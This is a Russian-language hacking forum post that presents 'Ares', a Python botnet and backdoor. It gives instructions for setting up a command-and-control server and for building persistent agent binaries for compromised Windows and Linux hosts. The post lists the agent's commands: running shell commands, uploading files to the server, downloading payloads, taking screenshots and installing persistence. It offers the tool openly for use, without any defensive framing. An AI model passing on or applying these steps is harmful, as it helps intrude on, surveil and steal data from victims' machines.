Ares - Python Botnet and Backdoor

  • Автор темы dallas
  • Дата начала
  • Участники 1

dallas

Newbie
21.09.2020
5
0
1
1601279818569.png
Ares - это инструмент удаленного доступа на основе Python.
Он состоит из двух основных программ:
Сервер управления и контроля, представляющий собой веб-интерфейс для администрирования агентов.
Программа агента, которая запускается на взломанном хосте и обеспечивает связь с ЧПУ.
Веб-интерфейс можно запустить на любом сервере с Python. Агент может быть скомпилирован в собственные исполняемые файлы с помощью pyinstaller.


Установка
Установите зависимости Python:
pip install -r requirements.txt

Инициализируйте бд:
cd server
./ares.py initdb


Чтобы скомпилировать агентов Windows в Linux, установите Wine (необязательно):
./wine_setup.sh

Сервер
Запускаем со встроенным (отладочным) сервером:
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded

Или используйте gunicorn
gunicorn ares:app -b 0.0.0.0:8080 --threads 20

Теперь сервер должен быть доступен по адресу http: // localhost: 8080.


Агент
Запустите агент Python (обновите config.py в соответствии с вашими потребностями):



cd agent
./agent.py


Создайте новый агент в автономном двоичном файле:

./builder.py -p Linux --server http://localhost:8080 -o agent
./agent


Чтобы увидеть список поддерживаемых опций, запустите ./builder.py -h
Код:
./agent/builder.py -h

usage: builder.py [-h] -p PLATFORM --server SERVER -o OUTPUT

                  [--hello-interval HELLO_INTERVAL] [--idle_time IDLE_TIME]

                  [--max_failed_connections MAX_FAILED_CONNECTIONS]

                  [--persistent]



Builds an Ares agent.



optional arguments:

  -h, --help            show this help message and exit

  -p PLATFORM, --platform PLATFORM

                        Target platform (Windows, Linux).

  --server SERVER       Address of the CnC server (e.g http://localhost:8080).

  -o OUTPUT, --output OUTPUT

                        Output file name.

  --hello-interval HELLO_INTERVAL

                        Delay (in seconds) between each request to the CnC.

  --idle_time IDLE_TIME

                        Inactivity time (in seconds) after which to go idle.

                        In idle mode, the agent pulls commands less often

                        (every <hello_interval> seconds).

  --max_failed_connections MAX_FAILED_CONNECTIONS

                        The agent will self destruct if no contact with the

                        CnC can be made <max_failed_connections> times in a

                        row.

  --persistent          Automatically install the agent on first run.
Поддерживаемые команды агента:

Код:
<any shell command>
Executes the command in a shell and return its output.

upload <local_file>
Uploads <local_file> to server.

download <url> <destination>
Downloads a file through HTTP(S).

zip <archive_name> <folder>
Creates a zip archive of the folder.

screenshot
Takes a screenshot.

python <command|file>
Runs a Python command or local file.

persist
Installs the agent.

clean
Uninstalls the agent.

exit
Kills the agent.

help
This help.
 

Об LS-LA

  • Мы, группа единомышленников, основная цель которых повышать уровень знаний и умений.
    Не забывая о материальном благополучии каждого)

About LS-LA

  • We, a group of like-minded people, whose main goal is to increase the level of knowledge and skills.
    Not forgetting about everyone’s material well-being)

Быстрая навигация

Пользовательское меню